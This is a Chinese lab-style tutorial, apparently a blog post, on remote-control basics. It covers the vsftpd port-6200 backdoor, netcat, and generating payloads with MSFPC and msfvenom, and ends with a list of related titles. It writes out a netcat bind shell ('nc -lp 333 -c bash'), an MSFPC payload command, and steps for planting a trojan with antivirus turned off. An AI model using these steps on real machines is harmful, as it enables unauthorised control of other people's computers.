笑脸漏洞与6200

如果目标主机被使用笑脸漏洞成功渗透,那么会自动在6200端口打开一个连接,可以实现攻击者对目标主机的控制。这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程控制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程控制。

netcat

网络工具中的老前辈,人们对他的评价极高(瑞士军刀)。netcat可以用做端口的扫描,同时也可以作为远程的服务端和控制端使用。在早期的局域网中,netcat被认为是最方便快捷的信息传输工具。netcat的所有功能如下:

1、侦听模式、传输模式

部署一下服务器端和监听端,即可实现局域网内对目标端口的监听。

服务器端:

nc -lp 80

监听端:

监听服务器的IP和端口号

nc -nv 192.168.XX.XX 80

显示连接成功。

然后随便输入一点什么按回车,可以直接传输文本信息

同时还可以传输TXT、MP4等文件,支持正向和反向传输。这里不进行演示

远程控制

nc -lp 333 -c bash

nc -nv 192.168.XX.XX 333

一个最简单的命令行远程控制。当然,这种程度的远控甚至不能称为是真正意义上的远控,毕竟只是在同一局域网下的测试,接下来会提到一些Android和windows下的被控端的生成与使用方法。

远程控制基础

远程控制是一个很常见的计算机用语,指的就是可以再一台设备上控制领一台设备的软件。

通常情况下,远程控制被分成两个部分,被控端和主控端。如果一台计算机运行了被控端,就会被另一台执行主控端的电脑控制。发生过的比较著名的事件就是灰鸽子事件,本来这是一个用来为工作提供便利的远控软件,但是后来当做木马利用,导致了很大的损失。

远程控制软件的分类标准有很多。这里不考虑这些软件的目的是恶意的还是善意的,只从技术角度对其进行分类,按照不同的连接方式,可以分为正向和反向两种。

正向:受害者计算机运行了被控端,会在计算机上打开一个端口,等待控制端进行控制(不会主动通知主控端),这导致了主控端必须得知被控端的地址,这在实际操作中具有很大的困难。

反向:受害者计算机运行了被控端,主动通知主控端自己的端口信息和IP地址,因此主控端无需事先得知被控端的信息,方便操作。

同时,按照目标系统来分类,我们平时使用的系统多种多样,但是运行的程序格式却不相同。例如windows上运行的程序大多是.EXE,Android运行的格式为.APK,但是控制软件往往采用和网站开发相同的语言,如.ASP、PHP等。

MSFPC

MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的Payload生成器,但是它旨在简化基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单地创建Payload,有时甚至只需要一个参数。(此段来源于CSDN其他内容)虽然使用MSFPC很方便,但是在本人生成windows的payload时,出现了主控端无法接收上线的情况。在使用标准MSF之后,问题解决。所以在以下内容中,简述MSFPC的使用方法,但windows被控端是使用MSF来实现的。

被控端运行在目标设备上,其实就是一个木马文件。我们平时使用的teamviwer、贝锐等等,其实和后门木马没有本质上的区别。被控端可以是一串代码,也可以是一个能够直接运行的程序。MSFPC是一个可以生成各种操作系统的远程控制被控端的工具,靠命令来完成任务。

首先,新建一个终端,输入msfpc。会打开主页面,上面提供了很多被控端的文件格式。

我们先用msfpc做一个linux的被控端,输入句法:

msfpc linux 192.168.XX.XX

可以看到被控端已经生成。

注意,如果不输入目标的IP地址,他会自动获取本机网卡的IP,但是使用的命令为ipconfig,这不适用于linux,所以会报错,但这不影响使用。 这里给出了两个选择,lo是环回网卡,eth0是对外通信网卡,我们使用eth0。2020年之后的版本中,会因为获取IP地址出错而导致脚本生成出错。

从执行的结果可以看到一些信息,其中CMD后面的内容就是和MSFPC相同效果的msfvenom命令,可以直接在终端中运行这段命令来生成一个完全相同的被控端。

接下来生成一个主控端,MSF handler file 后面就是脚本文件的位置,执行这个脚本即可,同时可以直接运行Run后面的内容,直接生成主控端:

然后随便执行一个命令,可以看到已经成功的控制目标主机

虽然有着更为简单的办法,但是我们还是要熟悉一下MSF的基本命令和参数。

在这些参数的帮助下,可以针对目标系统生成不同的payload。生成windows的payload命令如下:

生成了一个名为horse的木马文件,生成的位置在主目录的根文件夹中。

随后随便用什么工具把这个文件下载到目标主机上,记得提前关闭杀毒软件和Windows安全中心,因为我们没有做免杀,随便一个什么杀毒软件都会报毒。

随后在kali中开启监听模式,步骤如下:

最后输入run命令开启监听,在windows目标主机上双击horse.exe

至此,我们已经能够通过简单的payload文件控制windows系统了,因为远程控制包含了许多的章节,这只是远程控制基础,后续还有android端和免杀。

攻击篇--远程控制(一)生成被控端与主控端相关推荐

  1. Kali Linux Armitage生成被控端和主控端

    目录 说明 使用 Armitage生成被控端和主控端 说明 按照<Kali Linux2 网络渗透测试实践指南 第二版 >第八章操作 仅供学习讨论使用,请勿进行非法操作 使用 Armita ...

  2. Kali渗透测试:使用 Armitage生成被控端和主控端

    Kali渗透测试:使用 Armitage生成被控端和主控端 Armitage就是一款使用Java为Metasploit编写的有图形化操作界面的软件,通过它可以轻松的使用Metasploit对目标进行攻 ...

  3. 内网靶场_从自做到拿下-攻击篇

    内网靶场_从自做到拿下-攻击篇 如有图片加载失败等问题 可通过本人公众号阅读:https://mp.weixin.qq.com/s/7MzYOZ10zrQCSZ2a9k23gw 1. 目录: 目 录 ...

  4. MySoft.Data入门篇:实体生成

    上一篇做了一些准备工作,包括创建数据库.项目等,介绍了MySoft.Data.本篇会介绍如何利用MySoft.Data附带的工具生成实体,并简单介绍一下对实体结构的看法. MySoft.Data的实体 ...

  5. 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----自定义攻击篇

    对现有的所能找到的DDOS代码(攻击模块)做出一次分析----自定义攻击篇 //=================================================== 分析者:alal ...

  6. 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇

    对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇 //======================================================== ...

  7. 【芯片前端】关于门控电路和逻辑做在D端还是EN端的思考

    最近在看<硬件架构的艺术--数字电路的设计方法与技术>,学习细化了很多之前模棱两可的知识点,偶尔来总结输出一下,今天就是这个主题--门控电路: 门控结构 相传在很多年前,时序逻辑里是没有门 ...

  8. 向日葵android比pc端慢很多,向日葵远程控制Android主控端9.5上线,交互流畅性全面升级...

    近日,向日葵发布全新移动端版本--向日葵远程控制Android主控端9.5版本.该版本对界面模块进行了调整,新增会心攻略模块,优化交互模式,提升按键宽容度,打造远控游戏的完美体验. 新增会心攻略,提供 ...

  9. 局域网arp攻击_「网络安全」常见攻击篇(23)——ARP攻击

    什么是ARP攻击? ARP攻击是利用ARP协议设计时缺乏安全验证漏洞来实现的,通过伪造ARP数据包来窃取合法用户的通信数据,造成影响网络传输速率和盗取用户隐私信息等严重危害. ARP攻击原理 ARP病 ...

最新文章

  1. C语言中float double等类型在内存中的存储
  2. spring中事务和传播属性配置代码
  3. mybatis 动态传入表名 注解_Mybatis动态sql的动态表名问题
  4. P2168 [NOI2015] 荷马史诗(哈夫曼编码树)
  5. Stream filter过滤案例
  6. SAP ABAP table control中用帮助(F4)实现自动填充另一字段教程
  7. java jdbc sql 参数_java – Postgresql JDBC表值参数
  8. 阳振坤:电动汽车与分布式数据库的共同命运
  9. Linux 制作安装程序(rpm,deb)的几个心得
  10. is not in the sudoers files的解决办法
  11. CSDN博客代码片黑色背景及代码高亮设置
  12. 局域网ip冲突检测工具_只需一台Android设备就能打通局域网内部通讯:文字聊天与文件传输...
  13. 第十一章 Caché 函数大全 $DATA 函数
  14. Ubuntu下搭建R语言开发环境
  15. (九) 正则表达式——文本处理(用s///替换、split与join函数、列表上下文中的m//、非贪婪量词、文件更新等)
  16. 任意文件读取与下载漏洞学习
  17. 项目管理中软件项目文档的分类管理
  18. PE 格式详解与试验
  19. kurento和打洞的服务器的安装及部署
  20. key 、primary key 、unique key 与index区别

热门文章

  1. python 函数练习题
  2. 医学知识---之T1,T2,flair,stir
  3. java-线程的实现方式
  4. PythonStock(29)股票系统:涛动周期论 经济周期决定人生财富命运,下一步的研究方向,从宏观角度进行市场行情研究。
  5. JAVA取两个整数的中间值,不出现溢出
  6. html5通用兄第选择器,css 通用兄弟选择器( ~ )
  7. 计算机网络 | 传输层的两个重要协议——TCP、UDP
  8. Leetcode 874. Walking Robot Simulation
  9. 史上最“牛”,荣辱参半的的JAVA群规和QQ群
  10. HTML5期末大作业:红酒主题——简单的品牌红酒销售网页设计(4页) HTML+CSS+JavaScript 期末大作业HTML代码